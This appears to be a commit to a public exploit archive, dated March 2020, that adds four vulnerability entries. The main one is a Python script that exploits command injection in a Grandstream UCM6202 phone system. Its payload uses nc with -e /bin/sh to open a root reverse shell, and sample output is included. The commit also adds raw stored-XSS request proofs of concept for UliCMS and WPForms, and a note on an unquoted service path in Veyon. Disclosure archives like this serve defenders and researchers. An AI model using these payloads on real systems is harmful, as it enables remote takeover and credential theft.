DB: 2020-03-25

4 changes to exploits/shellcodes Veyon 4.3.4 - 'VeyonService' Unquoted Service Path UliCMS 2020.1 - Persistent Cross-Site Scripting Wordpress Plugin WPForms 1.5.9 - Persistent Cross-Site Scripting UCM6202 1.0.18.13 - Remote Command Injection
2020-03-25 05:01:47 +00:00 · 2020-03-25 05:01:47 +00:00 · 52df09d89e
commit 52df09d89e
parent b84d953124
5 changed files with 250 additions and 0 deletions
--- a/exploits/hardware/webapps/48247.py
+++ b/exploits/hardware/webapps/48247.py
@ -0,0 +1,120 @@
+# Exploit Title: UCM6202 1.0.18.13 - Remote Command Injection
+# Date: 2020-03-23
+# Exploit Author: Jacob Baines
+# Vendor: http://www.grandstream.com
+# Product Link: http://www.grandstream.com/products/ip-pbxs/ucm-series-ip-pbxs/product/ucm6200-series
+# Tested on: UCM6202 1.0.18.13
+# CVE : CVE-2020-5722
+# Shodan Dork: ssl:"Grandstream" "Set-Cookie: TRACKID"
+# Advisory: https://www.tenable.com/security/research/tra-2020-15
+#
+# Sample output:
+# albinolobster@ubuntu:~$ python3 pbx_sploit.py --rhost 192.168.2.1 --lhost 192.168.2.107
+# [+] Sending getInfo request to  https://192.168.2.1:8089/cgi
+# [+] Remote target info:
+# -> Model:  UCM6202
+# -> Version:  1.0.18.13
+# [+] Vulnerable version!
+# [+] Sending exploit. Reverse shell to 192.168.2.107:1270
+#
+# albinolobster@ubuntu:~$ nc -lvp 1270
+# Listening on [] (family 2, port)
+# Connection from _gateway 41675 received!
+# whoami
+# root
+# uname -a
+# Linux UCM6202 3.0.35 #1 SMP PREEMPT Thu Jul 5 15:56:51 CST 2018 armv7l GNU/Linux
+##
+
+import os
+import re
+import sys
+import json
+import argparse
+import requests
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+top_parser = argparse.ArgumentParser(description='')
+top_parser.add_argument('--rhost', action="store", dest="rhost",
+required=True, help="The remote host to connect to")
+top_parser.add_argument('--rport', action="store", dest="rport", type=int,
+help="The remote port to connect to", default=8089)
+top_parser.add_argument('--lhost', action="store", dest="lhost",
+required=True, help="The local host to connect back to")
+top_parser.add_argument('--lport', action="store", dest="lport", type=int,
+help="The local port to connect back to", default=1270)
+args = top_parser.parse_args()
+
+
+url = 'https://' + args.rhost + ':' + str(args.rport) + '/cgi'
+print('[+] Sending getInfo request to ', url)
+
+try:
+    resp = requests.post(url=url, data='action=getInfo', verify=False)
+except Exception:
+    print('[-] Error connecting to remote target')
+    sys.exit(1)
+
+if resp.status_code != 200:
+    print('[-] Did not get a 200 OK on getInfo request')
+    sys.exit(1)
+
+if resp.text.find('{ "response":') != 0:
+    print('[-] Unexpected response')
+    sys.exit(1)
+
+try:
+    parsed_response = json.loads(resp.text)
+except Exception:
+    print('[-] Unable to parse json response')
+    sys.exit(1)
+
+print('[+] Remote target info: ')
+print('\t-> Model: ', parsed_response['response']['model_name'])
+print('\t-> Version: ', parsed_response['response']['prog_version'])
+
+match = re.match('^([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)$',
+parsed_response['response']['prog_version'])
+if not match:
+    print('[-] Failed to extract the remote targets version')
+    sys.exit(1)
+
+major = int(match[1])
+minor = int(match[2])
+point = int(match[3])
+patch = int(match[4])
+
+if (major > 1) or (major == 1 and minor > 0) or (major == 1 and minor == 0
+and point > 19) or (major == 1 and minor == 0 and point == 19 and patch >=
+20):
+    print('[-] Unaffected version')
+    sys.exit(1)
+else:
+    print('[+] Vulnerable version!')
+
+print('[+] Sending exploit. Reverse shell to %s:%i' % (args.lhost,
+args.lport))
+try:
+    exploit = 'admin\' or 1=1--`;`nc${IFS}' + args.lhost + '${IFS}' +
+str(args.lport) + '${IFS}-e${IFS}/bin/sh`;`'
+    resp = requests.post(url=url,
+data='action=sendPasswordEmail&user_name=' + exploit, verify=False)
+except Exception as err:
+    print('[-] Failed to send payload')
+    sys.exit(1)
+
+if resp.status_code != 200:
+    print('[-] Did not get a 200 OK on sendPasswordEmail request')
+    sys.exit(1)
+
+try:
+    parsed_response = json.loads(resp.text)
+except Exception:
+    print('[-] Unable to parse json response')
+    sys.exit(1)
+
+if parsed_response['status'] == 0:
+    print('[+] Success! Clean exit.')
+else:
+    print('[-] Something bad happened.')
--- a/exploits/php/webapps/48244.txt
+++ b/exploits/php/webapps/48244.txt
@ -0,0 +1,49 @@
+# Exploit Title: UliCMS 2020.1 - Persistent Cross-Site Scripting
+# Google Dork: N/A
+# Date: 2019-03-24
+# Exploit Author: SunCSR
+# Vendor Homepage: https://en.ulicms.de
+# Software Link: https://en.ulicms.de/current_versions.html
+# Version: 2020.1
+# Tested on: Windows
+# CVE : N/A
+
+### Vulnerability : Stored Cross-Site Scripting
+
+# Description
+A stored cross-site-scripting security issue in the save page feature
+Url : http://TARGET/ulicms/admin/index.php?action=pages_edit&page=20
+Request Type: POST
+Vulnerable Parameter : "content"
+Payload : content=<script>alert('XSS')</script>
+
+#POC
+POST /ulicms/admin/index.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
+Accept: */*
+Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://TARGET/ulicms/admin/index.php?action=pages_edit&page=20
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 866
+Origin: http://TARGET
+Connection: close
+Cookie: 5e71dbd610916_SESSION=bt38jrlr7ajgc28t6db10mdgu7
+
+csrf_token=f7249e4cc148ffc3383b6f6254dfc6cb&sClass=PageController&sMethod=edit&edit_page=edit_page&page_id=20
+&slug=lorem_ipsum&title=Lorem+Ipsum&alternate_title=&show_headline=1&type=page&language=de&menu=top&position=15
+&parent_id=NULL&active=1&target=_self&hidden=0&category_id=1&menu_image=&link_url=&link_to_language=
+&meta_description=&meta_keywords=&robots=&article_author_name=&article_author_email=&article_date=&excerpt=&og_title=
+&og_description=&og_image=&list_type=null&list_language=&list_category=0&list_menu=&list_parent=&list_order_by=title
+&list_order_direction=asc&limit=0&list_use_pagination=0&module=null&video=&audio=&image_url=
+&text_position=before&article_image=&author_id=1&group_id=1&comments_enabled=null&cache_control=auto&theme=
+&access%5B%5D=all&custom_data=%7B%7D&content=<script>alert('XSS')</script>&csrf_token=f7249e4cc148ffc3383b6f6254dfc6cb
+
+### History
+=============
+2019-03-18  Issue discovered
+2019-04-18  Vendor contacted
+2019-04-18  Vendor response and hotfix
+2019-04-24  Vendor releases fixed versions
--- a/exploits/php/webapps/48245.txt
+++ b/exploits/php/webapps/48245.txt
@ -0,0 +1,36 @@
+# Exploit Title: Wordpress Plugin WPForms 1.5.9 - Persistent Cross-Site Scripting
+# Date: 2020-02-18
+# Vendor Homepage: https://wpforms.com
+# Vendor Changelog: https://wordpress.org/plugins/wpforms-lite/#developers
+# Exploit Author: Jinson Varghese Behanan
+# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/stored-xss-vulnerability-found-in-wpforms-plugin/
+# Author Homepage: https://www.jinsonvarghese.com
+# Version: 1.5.8.2 and below
+# CVE : CVE-2020-10385
+
+1. Description
+
+WPForms is a popular WordPress forms plugin with over 3 million active installations. The Form Description and Field Description fields in the WPForms plugin’s Form Builder module was found to be vulnerable to stored XSS, as they did not sanitize user given input properly. While they do not pose high security threat being an authenticated XSS vulnerability, an attacker can potentially exploit this to perform malicious actions on a WordPress multisite installation to have a super admin’s cookies sent to the attacker or redirect the super admin to another domain, for example, a phishing page designed to show that they have been logged out and would need to log back in, thus compromising their credentials. The form builder’s “preview” function was also vulnerable to reflected XSS. All WordPress websites using WPForms version 1.5.8.2 and below are affected.
+
+2. Proof of Concept
+
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: ptest.com
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://ptest.com/wp-admin/admin.php?page=wpforms-builder&view=settings&form_id=23
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 3140
+Origin: http://ptest.com
+Connection: close
+Cookie: wp-saving-post=15-saved; wordpress_db156a460ca831632324809820a538ce=jinson%7C1582145873%7CBKGMGaw77TcSEz7kE0ijBd8VfAq7KwALhBVfKNRbKst%7Cf826697f923b7f17c30049eea275c6523b7e2418ab354e106c50f0314b9bdae9; comment_author_email_db156a460ca831632324809820a538ce=dev-email@flywheel.local; comment_author_db156a460ca831632324809820a538ce=jinson; wp-settings-time-1=1581973079; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_db156a460ca831632324809820a538ce=jinson%7C1582145873%7CBKGMGaw77TcSEz7kE0ijBd8VfAq7KwALhBVfKNRbKst%7Cbaecd49d797bff21499da712891744737c67fd481d59e04a952554579f26c637
+
+action=wpforms_save_form&data=%5B%7B%22name%22%3A%22id%22%2C%22value%22%3A%2223%22%7D%2C%7B%22name%22%3A%22field_id%22%2C%22value%22%3A%2213%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bid%5D%22%2C%22value%22%3A%2211%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Btype%5D%22%2C%22value%22%3A%22text%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Blabel%5D%22%2C%22value%22%3A%22Single+Line+Text%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bdescription%5D%22%2C%22value%22%3A%22%3Cscript%3Ealert(%5C%22XSS+on+form+description%5C%22)%3C%2Fscript%3E%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bsize%5D%22%2C%22value%22%3A%22medium%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bplaceholder%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Blimit_count%5D%22%2C%22value%22%3A%221%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Blimit_mode%5D%22%2C%22value%22%3A%22characters%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bdefault_value%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Bcss%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22fields%5B11%5D%5Binput_mask%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22settings%5Bform_title%5D%22%2C%22value%22%3A%22Security+Test+WPForms%22%7D%2C%7B%22name%22%3A%22settings%5Bform_desc%5D%22%2C%22value%22%3A%22%3Cscript%3Ealert(%5C%22XSS+on+form+description+2%5C%22)%3C%2Fscript%3E%22%7D%2C%7B%22name%22%3A%22settings%5Bform_class%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22settings%5Bsubmit_text%5D%22%2C%22value%22%3A%22Submit%22%7D%2C%7B%22name%22%3A%22settings%5Bsubmit_text_processing%5D%22%2C%22value%22%3A%22Sending...%22%7D%2C%7B%22name%22%3A%22settings%5Bsubmit_class%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22settings%5Bhoneypot%5D%22%2C%22value%22%3A%221%22%7D%2C%7B%22name%22%3A%22settings%5Bnotification_enable%5D%22%2C%22value%22%3A%221%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bemail%5D%22%2C%22value%22%3A%22%7Badmin_email%7D%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bsubject%5D%22%2C%22value%22%3A%22New+Security+Test+WPForms+Entry%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bsender_name%5D%22%2C%22value%22%3A%22ptest%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bsender_address%5D%22%2C%22value%22%3A%22%7Badmin_email%7D%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Breplyto%5D%22%2C%22value%22%3A%22%22%7D%2C%7B%22name%22%3A%22settings%5Bnotifications%5D%5B1%5D%5Bmessage%5D%22%2C%22value%22%3A%22%7Ball_fields%7D%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Btype%5D%22%2C%22value%22%3A%22message%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Bmessage%5D%22%2C%22value%22%3A%22%3Cp%3EThanks+for+contacting+us!+We+will+be+in+touch+with+you+shortly.%3C%2Fp%3E%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Bmessage_scroll%5D%22%2C%22value%22%3A%221%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Bpage%5D%22%2C%22value%22%3A%222%22%7D%2C%7B%22name%22%3A%22settings%5Bconfirmations%5D%5B1%5D%5Bredirect%5D%22%2C%22value%22%3A%22%22%7D%5D&id=23&nonce=938cf431d2
+
+3. Timeline
+
+Vulnerability reported to the WPForms team – February 18, 2020
+WPForms version 1.5.9 containing the fix released – March 5, 2020
--- a/exploits/windows/local/48246.txt
+++ b/exploits/windows/local/48246.txt
@ -0,0 +1,41 @@
+# Exploit Title: Veyon 4.3.4 - 'VeyonService' Unquoted Service Path
+# Discovery by: Víctor García
+# Discovery Date: 2020-03-23
+# Vendor Homepage: https://veyon.io/
+# Software Link:
+https://github.com/veyon/veyon/releases/download/v4.3.4/veyon-4.3.4.0-win64-setup.exe
+# Tested Version: 4.3.4
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Pro x64
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "C:\Windows\\" |findstr /i /v """
+Veyon Service     VeyonService     C:\Program Files\Veyon\veyon-service.exe
+
+
+# Service info:
+
+C:\>sc qc VeyonService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: VeyonService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Veyon\veyon-service.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Veyon Service
+        DEPENDENCIES       : Tcpip
+                           : RpcSs
+        SERVICE_START_NAME : LocalSystem
+
+
+# Exploit:
+
+# A successful attempt would require the local user to be able to insert their code in the
+# system root path undetected by the OS or other security applications where it could
+# potentially be executed during application startup or reboot. If successful, the local
+# user's code would execute with the elevated privileges of the application.
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -10997,6 +10997,7 @@ id,file,description,date,author,type,platform,port
 48231,exploits/multiple/local/48231.md,"Microsoft VSCode Python Extension - Code Execution",2020-03-17,Doyensec,local,multiple,
 48232,exploits/macos/local/48232.md,"VMWare Fusion - Local Privilege Escalation",2020-03-17,Grimm,local,macos,
 48235,exploits/macos/local/48235.sh,"VMware Fusion 11.5.2 - Privilege Escalation",2020-03-20,"Rich Mirch",local,macos,
+48246,exploits/windows/local/48246.txt,"Veyon 4.3.4 - 'VeyonService' Unquoted Service Path",2020-03-24,"Víctor García",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42492,3 +42493,6 @@ id,file,description,date,author,type,platform,port
 48240,exploits/multiple/webapps/48240.txt,"FIBARO System Home Center 5.021 - Remote File Include",2020-03-23,LiquidWorm,webapps,multiple,
 48241,exploits/php/webapps/48241.py,"rConfig 3.9.4 - 'search.crud.php' Remote Command Injection",2020-03-23,"Matthew Aberegg",webapps,php,
 48242,exploits/php/webapps/48242.txt,"Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection",2020-03-23,qw3rTyTy,webapps,php,
+48244,exploits/php/webapps/48244.txt,"UliCMS 2020.1 - Persistent Cross-Site Scripting",2020-03-24,SunCSR,webapps,php,
+48245,exploits/php/webapps/48245.txt,"Wordpress Plugin WPForms 1.5.9 - Persistent Cross-Site Scripting",2020-03-24,"Jinson Varghese Behanan",webapps,php,
+48247,exploits/hardware/webapps/48247.py,"UCM6202 1.0.18.13 - Remote Command Injection",2020-03-24,"Jacob Baines",webapps,hardware,